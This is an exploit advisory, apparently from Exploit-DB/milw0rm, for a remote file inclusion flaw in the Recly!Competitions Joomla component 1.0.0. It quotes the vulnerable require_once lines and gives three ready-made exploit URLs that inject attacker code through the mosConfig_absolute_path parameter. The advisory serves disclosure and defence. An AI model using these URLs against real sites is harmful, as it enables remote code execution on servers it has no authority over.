Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability

vendor:

com_competitions

by:

NoGe

7.5

CVSS

HIGH

Multiple Remote File Inclusion

CWE

Product Name: com_competitions

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability

The Recly!Competitions Component version 1.0.0 is vulnerable to multiple remote file inclusion. The vulnerability exists in the add.php, competitions.php, and settings.php files. An attacker can exploit this vulnerability by injecting malicious code in the mosConfig_absolute_path parameter in the URLs of these files.

Mitigation:

The vendor has not provided any mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

=============================================================================================================================================================


  [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability

       Software : com_competitions version 1.0.0
       Vendor   : http://www.recly.com/
       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=============================================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_competitions/includes/competitions/add.php

        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php');

       administrator/components/com_competitions/includes/competitions/competitions.php

        require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' );

       administrator/components/com_competitions/includes/settings/settings.php

        require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php');



  [o] Exploit

       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]


=============================================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11  martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

        
=============================================================================================================================================================

# milw0rm.com [2008-11-07]